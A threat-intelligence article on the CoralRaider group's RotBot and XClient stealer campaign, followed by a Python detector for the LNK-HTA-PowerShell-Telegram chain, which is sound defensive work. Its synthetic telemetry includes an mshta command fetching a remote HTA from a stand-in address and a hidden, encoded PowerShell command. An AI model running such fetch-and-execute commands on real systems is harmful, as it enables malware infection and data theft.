RotBot Malware Used on Asian Victims
A suspected threat actor of Vietnamese origin has been observed targeting individuals in several Asian and Southeast Asian countries with information-stealing malware since at least May 2023. Tracked by Cisco Talos as CoralRaider, the group appears to be financially motivated. Its campaign spans India, China, South Korea, Bangladesh, Pakistan, Indonesia, and Vietnam.
Security researchers Chetan Raghuprasad and Joey Chen have noted that CoralRaider concentrates on pilfering victims' credentials, financial records, and social media profiles, including business and advertising accounts. They deploy customized variants of Quasar RAT named RotBot and XClient stealer as their primary tools.
In addition to these, the group employs various off-the-shelf malware such as AsyncRAT, NetSupport RAT, and Rhadamanthys for remote access and data theft. Particularly in Vietnam, they have shown interest in seizing control of business and advertising accounts using malware families like Ducktail, NodeStealer, and VietCredCare.
Telegram Used to Funnel Stolen Data
The stolen information is exfiltrated through Telegram and sold in underground markets for profit. CoralRaider's operators are believed to be based in Vietnam, as evidenced by their communication on Telegram channels and the Vietnamese-language strings found in their tools.
Their attack typically begins with a Windows shortcut file (LNK), although how the LNK is distributed remains unclear. Opening the LNK file downloads an HTML Application (HTA) file from an attacker-controlled server and runs it, which triggers an embedded VBScript. That script decrypts and executes three PowerShell scripts in sequence; these handle evasion of defenses and the deployment of RotBot.
RotBot, once activated, connects with a Telegram bot to retrieve and execute XClient stealer in memory. This malware specializes in harvesting cookies, credentials, and financial data from popular web browsers such as Brave, Cốc Cốc, Google Chrome, Microsoft Edge, Mozilla Firefox, and Opera, along with data from Discord and Telegram.
Moreover, XClient is designed to extract information from victims' social media accounts like Facebook, Instagram, TikTok, and YouTube, including details related to payment methods and permissions associated with Facebook business and advertising accounts.
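The infection chain above (LNK, then an HTA fetched from a remote server, then PowerShell spawned by the script host, then Telegram bot traffic from RotBot) leaves a recognisable trail in endpoint telemetry. The following detection logic is an added example written for this page; it is not code from Cisco Talos or from the CoralRaider research. It runs over constructed, Sysmon-style process-creation and network-connection records. The assumptions are labelled in the code: that the LNK's target is mshta.exe (the Windows HTA host) pulling the HTA straight from a URL, that the Telegram bot traffic goes to the public Bot API host api.telegram.org, and that the RotBot process name (here "client.exe") is a placeholder, since the article does not give one.

```python
"""Detect the LNK -> HTA -> PowerShell -> Telegram chain in constructed telemetry.

Added example, not from the original article or from Cisco Talos. The telemetry
lines are synthetic and pipe-delimited: kind|pid|image|parent_image|cmdline|dest_host.
"""
import re
from dataclasses import dataclass

# Windows script hosts that can run an HTA or script fetched from a URL.
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}
# Assumption: bot traffic goes to Telegram's public Bot API host.
TELEGRAM_BOT_HOST = "api.telegram.org"
# Assumed allowlist of processes expected to talk to that host; tune per fleet.
TELEGRAM_ALLOWLIST = {"telegram.exe", "chrome.exe", "msedge.exe", "firefox.exe", "brave.exe", "opera.exe"}
URL_RE = re.compile(r"https?://", re.I)
# Hidden window or encoded command on the PowerShell command line.
HIDDEN_RE = re.compile(r"(?:^|\s)-(?:w|win|windowstyle)\s+hidden\b|(?:^|\s)-(?:e|ec|enc|encodedcommand)\s", re.I)


@dataclass
class Event:
    kind: str        # "proc" (process creation) or "net" (outbound connection)
    pid: int
    image: str       # process image basename, lower-cased
    parent: str      # parent image basename, "" if unknown
    cmdline: str
    dest_host: str   # destination host for "net" events, "" otherwise


def parse_line(line: str) -> Event:
    """Parse one constructed, pipe-delimited telemetry line into an Event."""
    kind, pid, image, parent, cmdline, dest = line.rstrip("\n").split("|", 5)
    return Event(kind, int(pid), image.lower(), parent.lower(), cmdline, dest.lower())


def detect(lines):
    """Return (rule, pid, detail) hits for each chain stage seen in the lines."""
    hits = []
    for ev in map(parse_line, lines):
        if ev.kind == "proc":
            # Stage 1: a script host pulling a remote HTA/script from a URL, which is
            # what opening the malicious LNK produces under the assumption above.
            if ev.image in SCRIPT_HOSTS and URL_RE.search(ev.cmdline):
                hits.append(("script_host_remote_url", ev.pid, ev.cmdline))
            # Stage 2: PowerShell launched by a script host (the HTA's VBScript
            # running the decrypted scripts); hidden/encoded raises confidence.
            if ev.image == "powershell.exe" and ev.parent in SCRIPT_HOSTS:
                detail = "hidden/encoded" if HIDDEN_RE.search(ev.cmdline) else "plain"
                hits.append(("powershell_from_script_host", ev.pid, detail))
        elif ev.kind == "net":
            # Stage 3: Telegram Bot API contact from a process that is neither the
            # Telegram client nor a browser (RotBot fetching XClient, or exfiltration).
            if ev.dest_host == TELEGRAM_BOT_HOST and ev.image not in TELEGRAM_ALLOWLIST:
                hits.append(("telegram_api_from_unexpected_process", ev.pid, ev.image))
    return hits


# Constructed sample telemetry; 203.0.113.10 is a documentation-range address.
SAMPLE_TELEMETRY = [
    "proc|4120|explorer.exe||C:\\Windows\\explorer.exe|",
    # LNK target: mshta.exe fetching the HTA from the attacker's server (assumed chain)
    "proc|5208|mshta.exe|explorer.exe|mshta.exe http://203.0.113.10/loader.hta|",
    # the HTA's VBScript runs the first decrypted PowerShell stage hidden and encoded
    "proc|5310|powershell.exe|mshta.exe|powershell.exe -w hidden -nop -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA|",
    # a later stage run from a dropped file, still parented by mshta.exe
    "proc|5400|powershell.exe|mshta.exe|powershell.exe -nop -f C:\\Users\\Public\\stage2.ps1|",
    # benign: an administrator's script started from Explorer (must not fire)
    "proc|6100|powershell.exe|explorer.exe|powershell.exe -nop -f C:\\Scripts\\backup.ps1|",
    # RotBot stand-in (placeholder name) polling the Telegram bot for XClient
    "net|5500|client.exe||C:\\Users\\Public\\client.exe|api.telegram.org",
    # benign: a browser reaching the same host (allowlisted, must not fire)
    "net|6000|chrome.exe||C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe|api.telegram.org",
]

if __name__ == "__main__":
    for rule, pid, detail in detect(SAMPLE_TELEMETRY):
        print(f"{rule:40s} pid={pid:<6d} {detail}")
```

Run as-is, the script reports the mshta fetch (pid 5208), both PowerShell children of mshta.exe (5310 flagged as hidden/encoded, 5400 as plain) and the unexpected Telegram API contact from client.exe (5500), while the Explorer-launched script and the browser connection stay silent. On real hosts the allowlist and the script-host set are the tuning points; the parent-child link between a script host and PowerShell is the part of this chain a legitimate workflow rarely reproduces.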